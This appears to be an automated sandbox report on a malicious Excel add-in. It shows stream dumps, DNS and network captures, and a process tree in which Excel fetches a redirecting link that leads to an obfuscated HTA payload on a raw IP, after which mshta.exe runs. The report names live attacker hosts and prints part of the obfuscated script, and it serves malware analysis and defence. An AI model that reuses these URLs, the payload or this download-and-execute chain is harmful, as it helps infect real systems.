      Data ASCII:. . . . . 0 . . i V . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . V . v . B . B . U . A . l . 9 . T . i . ? . & . c . o . m . p . u . l . s . i . o . n . = . z . e . a . l . o . u . s . & . m . o . o . d . . . 2 . . . h 6 j . l . / . . . . . . . + k . . w ^ E . M Y % q . * 1 W . _ U . . a . ^ 8 U \\ . . h . n 8 . . . [ # . + o $ j = r u ] . . 2 u h . k . N 8 E W I J . . . W . 7 = > 1 . . [ & o % . . . . . . . . . . . . . .
      Data Raw:01 00 00 02 0d 95 30 02 d2 0c 69 56 00 00 00 00 00 00 00 00 00 00 00 00 16 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 12 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 56 00 76 00 42 00 42 00 55 00 41 00 6c 00 39 00 54 00 69 00 3f 00 26 00 63 00 6f 00 6d 00 70 00 75 00 6c 00 73 00 69 00
      General
      Stream Path:Workbook
      CLSID:
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:316629
      Entropy:7.998637073721496
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . } . . . m v v . i J , . i X ! . N > B = u . ~ G / . . . . . . . . . . t . . . . \\ . p . N 6 P . D J S 6 j b | | > } S - . . j ' 8 . 0 O g / # . ^ h c O ` k . C f n / . 3 _ . . . + G . v o . E _ 0 t D j : / B . . . n a . . . . . . . = . . . x F Q . . . . S } 4 . . 8 . X . . . . A . . . . . . . . . " . . . . = . . . 1 . . . . = . . . 4 . E . m @ . . . x . . . 3 " . . . S . . . . . ~ . . . . . . { . 1 . . . . * . d + . 3 f # ? " 5 s # v N . 1 . . . G .
      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 de 86 95 1f 7d 15 00 db e7 01 c7 6d 76 c6 76 19 e3 69 b3 84 bd 4a 2c a8 1c bf 69 58 c0 f1 98 21 1a 4e d9 fd 3e e4 42 3d b4 ce 75 00 bb 7e 47 2f 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 74 00 e2 00 00 00 5c 00 70 00 4e 36 50 03 9f a8 e0 44 be 4a 53 fa 80 36 6a 62 7c 7c c8 3e a3 7d c3 53 bd c8
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      CLSID:
      File Type:ASCII text, with CRLF line terminators
      Stream Size:527
      Entropy:5.279649998615774
      Base64 Encoded:True
      Data ASCII:I D = " { 5 2 B 6 0 E C 6 - 0 9 9 E - 4 D 8 C - 8 A 5 B - B 7 8 B 7 D 3 C E C 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B F B D A 1 A E 6 3 5 6 D C 5 A D
      Data Raw:49 44 3d 22 7b 35 32 42 36 30 45 43 36 2d 30 39 39 45 2d 34 44 38 43 2d 38 41 35 42 2d 42 37 38 42 37 44 33 43 45 43 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      CLSID:
      File Type:data
      Stream Size:104
      Entropy:3.0488640812019017
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      CLSID:
      File Type:data
      Stream Size:2644
      Entropy:3.982462153871729
      Base64 Encoded:True
      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      TimestampSource PortDest PortSource IPDest IP
      Dec 17, 2024 10:40:49.039880991 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.039916992 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:49.040168047 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.040291071 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.040308952 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:49.538182020 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:49.538433075 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.540554047 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.540600061 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:49.541593075 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:49.541788101 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.542045116 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:49.582302094 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:50.738665104 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:50.738898993 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:50.738903999 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:50.739109039 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:50.742877960 CET49755443192.168.11.20170.82.174.30
      Dec 17, 2024 10:40:50.742933035 CET44349755170.82.174.30192.168.11.20
      Dec 17, 2024 10:40:50.743678093 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:50.918464899 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:50.918704987 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:50.918833017 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.096921921 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097045898 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097111940 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097155094 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097162008 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097198009 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097239971 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097281933 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097321987 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097321033 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097363949 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097364902 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097404957 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.097462893 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097462893 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097515106 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097515106 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.097609997 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.187447071 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.187447071 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.271503925 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.271565914 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.271612883 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.271739006 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.271887064 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.271940947 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272059917 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272068024 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272124052 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272166014 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272207975 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272252083 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272294044 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272336960 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272378922 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272394896 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272452116 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272495985 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272537947 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272583008 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272588015 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272639036 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272646904 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272690058 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272711992 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272747993 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272769928 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.272814035 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.272927046 CET4975680192.168.11.20172.245.123.12
      Dec 17, 2024 10:40:51.361218929 CET8049756172.245.123.12192.168.11.20
      Dec 17, 2024 10:40:51.361422062 CET4975680192.168.11.20172.245.123.12
      TimestampSource PortDest PortSource IPDest IP
      Dec 17, 2024 10:40:48.473565102 CET5655853192.168.11.201.1.1.1
      Dec 17, 2024 10:40:49.023215055 CET53565581.1.1.1192.168.11.20
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 17, 2024 10:40:48.473565102 CET192.168.11.201.1.1.10x67f2Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 17, 2024 10:40:49.023215055 CET1.1.1.1192.168.11.200x67f2No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
      Dec 17, 2024 10:40:49.023215055 CET1.1.1.1192.168.11.200x67f2No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
      Dec 17, 2024 10:40:49.023215055 CET1.1.1.1192.168.11.200x67f2No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
      • curt.wiz.co
      • 172.245.123.12
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.11.2049756172.245.123.12802744C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      TimestampBytes transferredDirectionData
      Dec 17, 2024 10:40:50.918833017 CET276OUTGET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Connection: Keep-Alive
      Host: 172.245.123.12
      Dec 17, 2024 10:40:51.096921921 CET1289INHTTP/1.1 200 OK
      Date: Tue, 17 Dec 2024 09:40:51 GMT
      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
      Last-Modified: Mon, 16 Dec 2024 08:16:25 GMT
      ETag: "241db-6295ecbefb4bc"
      Accept-Ranges: bytes
      Content-Length: 147931
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/hta
      Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
      Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32
      Dec 17, 2024 10:40:51.097045898 CET1289INData Raw: 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36 34 25 32 35 25 33 32 25 33 30 25 32 35 25 33 37 25
      Data Ascii: %32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%30%25%35%64%25%32%39%25%33%62%25%30%61%25%30
      Dec 17, 2024 10:40:51.097111940 CET1289INData Raw: 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 33 39 25 32 35 25 33 32 25 33 35 25 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 36 33 25 32 35 25 33 36 25 33 35 25 32 35 25 33 36 25 36 35 25 32 35 25 33 36 25 33 37
      Data Ascii: 4%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%33%25%36%66%25%36%34%25%36%35%25%34%31%25%37%34%25%32%3
      Dec 17, 2024 10:40:51.097155094 CET1289INData Raw: 33 37 25 33 37 25 32 35 25 33 37 25 33 38 25 32 35 25 33 36 25 36 34 25 32 35 25 33 37 25 33 34 25 32 35 25 33 37 25 36 33 25 32 35 25 33 34 25 33 30 25 32 35 25 33 32 25 36 32 25 32 35 25 33 35 25 33 34 25 32 35 25 33 34 25 33 35 25 32 35 25 33
      Data Ascii: 37%37%25%37%38%25%36%64%25%37%34%25%37%63%25%34%30%25%32%62%25%35%34%25%34%35%25%34%35%25%34%35%25%37%33%25%37%39%25%37%35%25%36%64%25%37%63%25%36%66%25%35%31%25%34%38%25%34%31%25%32%66%25%32%30%25%34%36%25%31%64%25%31%34%25%34%30%25%37%31%25%
      Dec 17, 2024 10:40:51.097198009 CET1289INData Raw: 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25
      Data Ascii: %30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31
      Dec 17, 2024 10:40:51.097239971 CET1289INData Raw: 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31
      Data Ascii: 0%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%36%36%25%37%61%25%34%38%25%35%35%25%35%30%25%35%33%25%34%65%25%36%33%25%34%61%25%36%38%25%35%38%25%38%61%25%34%62%25%35%66%25%35%61%25%37%3
      Dec 17, 2024 10:40:51.097281933 CET1289INData Raw: 32 35 25 33 34 25 36 36 25 32 35 25 33 36 25 33 31 25 32 35 25 33 36 25 36 36 25 32 35 25 33 37 25 33 38 25 32 35 25 33 35 25 36 35 25 32 35 25 33 35 25 33 34 25 32 35 25 33 35 25 36 35 25 32 35 25 33 35 25 33 33 25 32 35 25 33 35 25 33 38 25 32
      Data Ascii: 25%34%66%25%36%31%25%36%66%25%37%38%25%35%65%25%35%34%25%35%65%25%35%33%25%35%38%25%37%33%25%36%36%25%36%62%25%35%31%25%36%39%25%37%36%25%35%63%25%37%62%25%36%39%25%37%37%25%37%61%25%34%32%25%34%62%25%35%35%25%37%63%25%34%65%25%34%66%25%36%34%
      Dec 17, 2024 10:40:51.097321987 CET1289INData Raw: 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25
      Data Ascii: %31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25
      Dec 17, 2024 10:40:51.097363949 CET1289INData Raw: 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31
      Data Ascii: 1%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%33%31%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%3
      Dec 17, 2024 10:40:51.097404957 CET1289INData Raw: 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33
      Data Ascii: 35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%
      Dec 17, 2024 10:40:51.271503925 CET1289INData Raw: 25 32 35 25 33 35 25 36 36 25 32 35 25 33 36 25 33 30 25 32 35 25 33 36 25 36 36 25 32 35 25 33 34 25 33 39 25 32 35 25 33 35 25 33 33 25 32 35 25 33 37 25 33 37 25 32 35 25 33 34 25 33 35 25 32 35 25 33 37 25 36 32 25 32 35 25 33 36 25 33 33 25
      Data Ascii: %25%35%66%25%36%30%25%36%66%25%34%39%25%35%33%25%37%37%25%34%35%25%37%62%25%36%33%25%37%36%25%35%37%25%37%34%25%35%65%25%35%30%25%36%62%25%37%36%25%37%65%25%35%33%25%37%33%25%34%36%25%37%33%25%34%36%25%37%33%25%34%65%25%36%64%25%37%62%25%35%37


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.11.2049755170.82.174.304432744C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      TimestampBytes transferredDirectionData
      2024-12-17 09:40:49 UTC244OUTGET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Host: curt.wiz.co
      Connection: Keep-Alive
      2024-12-17 09:40:50 UTC983INHTTP/1.1 302 Found
      Date: Tue, 17 Dec 2024 09:40:50 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 108
      Connection: close
      Set-Cookie: sess=123; path=/; Secure; HttpOnly
      Location: http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
      Strict-Transport-Security: max-age=31536000; includeSubDomains
      x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      X-Download-Options: noopen
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
      Referrer-Policy: strict-origin
      Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
      X-GoCache-CacheStatus: BYPASS
      2024-12-17 09:40:50 UTC108INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 32 33 33 2f 65 65 63 2f 63 72 65 61 74 65 64 62 65 74 74 65 72 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 6e 72 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 6e 69 63 65 2e 68 74 61
      Data Ascii: Found. Redirecting to http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:04:39:58
      Start date:17/12/2024
      Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
      Imagebase:0x7ff6ffd00000
      File size:64'236'848 bytes
      MD5 hash:14243BD2CC9F1814023132241A51E1C6
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Target ID:7
      Start time:04:40:50
      Start date:17/12/2024
      Path:C:\Windows\System32\mshta.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\mshta.exe -Embedding
      Imagebase:0x7ff73d2e0000
      File size:14'848 bytes
      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Target ID:8
      Start time:04:40:56
      Start date:17/12/2024
      Path:C:\Windows\splwow64.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\splwow64.exe 12288
      Imagebase:0x7ff7d5920000
      File size:136'192 bytes
      MD5 hash:3F93FFE9B04F940E7B0A1B3267814592
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Target ID:10
      Start time:04:41:09
      Start date:17/12/2024
      Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla"
      Imagebase:0x7ff6ffd00000
      File size:64'236'848 bytes
      MD5 hash:14243BD2CC9F1814023132241A51E1C6
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      No disassembly